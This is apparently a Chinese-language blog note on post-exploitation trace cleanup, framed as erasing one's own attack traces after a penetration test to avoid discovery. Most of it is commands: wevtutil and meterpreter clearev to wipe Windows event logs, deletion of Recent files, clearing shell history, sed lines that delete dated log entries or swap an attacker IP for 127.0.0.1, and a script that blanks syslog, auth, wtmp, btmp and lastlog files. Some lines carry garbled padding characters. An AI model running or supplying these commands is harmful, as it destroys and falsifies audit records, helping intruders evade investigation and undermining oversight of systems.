后渗透痕迹清理记录
簡介
滲透測試結(jié)束后,為了減少被發(fā)現(xiàn)和追溯的概率,有必要清除自己的攻擊痕跡,這里注意記錄一下自己收集記錄的一些技巧,注意是清理掉訪問日志等各種記錄,愿用的上。
Windows日志清理
開始程序-->管理工具-->計(jì)算機(jī)管理-->系統(tǒng)工具-->事件查看器-->清除日志windows + r
eventvwr.msc(事件查看器) --> 清除日志記錄
wevtutil 命令
wevtutil el???????????????????? #列出系統(tǒng)中所有日志
wevtutil cl system???????? #清理系統(tǒng)日志
wevtutil cl application?? #清理應(yīng)用程序日志
wevtutil cl security??????? #清理安全日志
meterpreter后滲透清理模塊
clearev(meterpreter自帶的清除日志命令)? #清除應(yīng)用程序日志、系統(tǒng)日志、安全日志
清除recent
刪除 C:\Users\Administrator\Recent下的所有內(nèi)容
del /f /s /q "%userprofile\Recent*.*"
Linux 日志清理
history -c
history -cw
history -r
rm .bash_history
echo "" .bash_history
#vim清理命令記錄
:set history=0
:!command
#清理當(dāng)天日志
sed -i '/當(dāng)天的日期/'d 文件名
#修改日志記錄
sed -i 's/172.0.4.5/127.0.0.1/g'? 文件名 ? ? ? #將所有172.0.4.5的ip替換為127.0.0.1
/var/log目錄下存放這linux主機(jī)的各種日志記錄
一定一定不能直接刪除,否則麻煩可能就大了,可以寫個(gè)小腳本將日志文件清空
#!/usr/bin/sh
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/secure
echo > /var/log/wtmp
echo > /var/log/btmp
echo > /var/log/utmp
echo > /var/log/lastlog
echo > /var/log/auth.log
echo > /var/log/user.log
rm .bash_history
history -cw
結(jié)語
人是會(huì)變的,人在懂事后也應(yīng)該做出改變,沒有改變就不會(huì)有進(jìn)步,改變不了想法的人什么也改變不了。
總結(jié)
